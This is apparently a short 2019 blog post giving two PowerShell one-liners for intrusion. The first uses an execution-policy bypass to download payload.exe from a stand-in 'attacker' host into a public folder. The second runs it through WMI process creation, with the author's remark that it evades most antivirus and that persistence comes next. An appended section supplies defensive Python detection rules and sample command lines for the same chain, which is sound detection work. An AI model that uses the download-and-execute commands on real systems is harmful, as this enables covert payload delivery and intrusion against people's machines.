Sunday, January 27, 2019

Two useful PowerShell cmds

Download bin:

powershell -exec bypass -c Invoke-WebRequest -Uri http://attacker/payload.exe -OutFile c:\Users\Public\Documents\payload.exe

Wrap the execution of payload.exe in a batch file called start.cmd and "download" it to the target the same way.

Execute bin:

powershell -exec bypass -c Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList c:\Users\Public\Documents\start.cmd

The PowerShell got around most AVs, and with the combination of the batch file and the PS cmd the payload should run on its own, no matter how you managed code execution on the target. Persistence is the next todo.
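From the defender's side, the two cmds above leave a recognisable pattern in process-creation telemetry (Sysmon Event ID 1 or Security 4688 command lines): an execution-policy bypass paired with a download into a world-writable folder, then a WMI Win32_Process Create spawn. The following Python is an added example, not from the original post; the sample command lines, rule names and severity scheme are constructed for illustration.

```python
import re

# Constructed sample process command lines, shaped like the CommandLine field of a
# Sysmon Event ID 1 or Security 4688 record. Not real telemetry; the first two mirror the post.
SAMPLE_EVENTS = [
    r"powershell -exec bypass -c Invoke-WebRequest -Uri http://attacker/payload.exe "
    r"-OutFile c:\Users\Public\Documents\payload.exe",
    r"powershell -exec bypass -c Invoke-WmiMethod -Class Win32_Process -Name Create "
    r"-ArgumentList c:\Users\Public\Documents\start.cmd",
    r"powershell -NoProfile -File C:\Scripts\inventory.ps1",
    r"powershell -ExecutionPolicy Bypass -c Get-ChildItem C:\Users\Public\Documents",
]

# Each rule targets one piece of the tradecraft in the post. powershell.exe accepts
# parameter prefixes, so -ex, -exec, -ep and -ExecutionPolicy are all covered by one pattern.
RULES = {
    "exec_policy_bypass": re.compile(r"-e[xp]\w*\s+bypass", re.I),
    "download_to_public": re.compile(
        r"\b(invoke-webrequest|iwr|wget|curl)\b.*-outfile\s+\S*\\users\\public\\", re.I),
    "wmi_process_create": re.compile(
        r"invoke-wmimethod\b.*\bwin32_process\b.*-name\s+create\b", re.I),
}

def match_rules(cmdline):
    """Return the names of all rules whose pattern appears in the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def severity(matched):
    """Bypass alone is low-fidelity (admins use it too); combined with a download or a
    WMI spawn it matches the chain in the post and is worth an alert."""
    if not matched:
        return "none"
    if "exec_policy_bypass" in matched and len(matched) > 1:
        return "high"
    return "medium"

def triage(events):
    """Run every rule over every command line; return only the events that matched."""
    alerts = []
    for cmdline in events:
        matched = match_rules(cmdline)
        if matched:
            alerts.append({"cmdline": cmdline, "rules": matched, "severity": severity(matched)})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['rules']}: {alert['cmdline']}")
```

The benign -ExecutionPolicy Bypass line only reaches "medium", which is the point: alert on the combination, not on the flag by itself.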